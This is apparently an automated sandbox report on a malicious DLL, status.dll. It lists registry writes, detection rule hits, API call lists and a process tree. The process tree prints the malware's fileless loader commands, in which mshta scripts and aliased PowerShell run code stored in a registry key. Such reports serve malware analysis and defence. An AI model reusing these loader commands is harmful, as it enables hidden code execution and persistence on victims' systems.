            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: status.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            Source: 00000006.00000002.476168753.000000000069B000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
            Source: 00000021.00000002.386067444.00000121EDC9B000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
            Source: 00000005.00000003.463693625.000000000308F000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_017D81DC
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_017D6C62
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_017D4EF3
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00FE0DF9
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00FE0DF7
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B09314
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B01FD5
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B17FC6
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B15E19
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B08572
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02D44EF3
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02D46C62
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02D481DC
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00960DF7
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00960DF9
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_048E8572
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_048F5E19
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_048F7FC6
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_048E1FD5
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04903724
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_048E9314
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04AA4EF3
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04AA6C62
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04AA81DC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_031C0DF9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_031C0DF7
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05918572
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05911FD5
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05927FC6
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05933724
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05925E19
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05919314
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00AC4EF3
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00AC6C62
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00AC81DC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00999314
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00998572
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_009A5E19
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00991FD5
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_009A7FC6
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_009B3724
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B05BD0 CreateProcessAsUserW,
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_017D77BB NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_017D462B GetProcAddress,NtCreateSection,memset,
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_017D2A0A NtMapViewOfSection,
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_017D8401 NtQueryVirtualMemory,
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00FE0AB8 NtProtectVirtualMemory,
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00FE0880 NtAllocateVirtualMemory,
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B141EE memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B0F6C4 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B03D90 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B0ECB4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B0DC0B NtQueryInformationProcess,
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B1EC5A RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B1945C GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B143A0 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B1DBFA NtQuerySystemInformation,RtlNtStatusToDosError,
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B13B11 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B0EB58 memset,NtQueryInformationProcess,
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B061AD OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B0C084 VirtualAlloc,VirtualAlloc,GetLastError,GetLastError,SwitchToThread,GetLastError,GetLastError,RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlExitUserThread,NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B0B012 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B1A044 NtGetContextThread,RtlNtStatusToDosError,
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B116BA NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B1D52D NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B0C423 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02D42A0A NtMapViewOfSection,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02D4462B GetProcAddress,NtCreateSection,memset,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02D477BB NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02D48401 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00960880 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00960AB8 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_048EECB4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_048EDC0B NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_048F945C GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_048FEC5A RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_048E3D90 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_048EF6C4 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_048F41EE memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_048EC423 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_048FD52D NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_048F16BA NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_048EC084 VirtualAlloc,VirtualAlloc,GetLastError,GetLastError,SwitchToThread,GetLastError,GetLastError,RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlExitUserThread,NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_048EB012 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_048FA044 NtGetContextThread,RtlNtStatusToDosError,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_048E61AD OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_048F43A0 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_048FDBFA NtQuerySystemInformation,RtlNtStatusToDosError,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_048F3B11 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_048EEB58 memset,NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04AA462B GetProcAddress,NtCreateSection,memset,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04AA2A0A NtMapViewOfSection,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04AA77BB NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04AA8401 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_031C0880 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_031C0AB8 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05913D90 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0591ECB4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0591DC0B NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0592EC5A RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0592945C GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0591F6C4 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_059241EE memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0592D52D NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0591C423 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_059216BA NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_059161AD OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0591C084 VirtualAlloc,VirtualAlloc,GetLastError,GetLastError,SwitchToThread,GetLastError,GetLastError,RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlExitUserThread,NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0591B012 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0592A044 NtGetContextThread,RtlNtStatusToDosError,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_059243A0 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0592DBFA NtQuerySystemInformation,RtlNtStatusToDosError,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05923B11 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0591EB58 memset,NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00AC462B GetProcAddress,NtCreateSection,memset,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00AC2A0A NtMapViewOfSection,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00AC77BB NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00AC8401 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_009A41EE memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0099ECB4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0099DC0B NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_009AEC5A RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_009A945C GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00993D90 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0099F6C4 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0099C084 VirtualAlloc,VirtualAlloc,GetLastError,GetLastError,SwitchToThread,GetLastError,GetLastError,RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlExitUserThread,NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0099B012 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_009AA044 NtGetContextThread,RtlNtStatusToDosError,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_009961AD OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_009A43A0 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_009ADBFA NtQuerySystemInformation,RtlNtStatusToDosError,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_009A3B11 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0099EB58 memset,NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0099C423 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_009AD52D NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_009A16BA NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
            Source: status.dllReversingLabs: Detection: 23%
            Source: status.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\status.dll"
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\status.dll",#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\status.dll
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\status.dll",#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\status.dll,DllRegisterServer
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:17422 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:82956 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:17430 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:82992 /prefetch:2
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bn49='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn49).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xap0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xap0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name viccxg -value gp; new-alias -name qooxkryog -value iex; qooxkryog ([System.Text.Encoding]::ASCII.GetString((viccxg "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ltid='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ltid).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tlot='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tlot).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
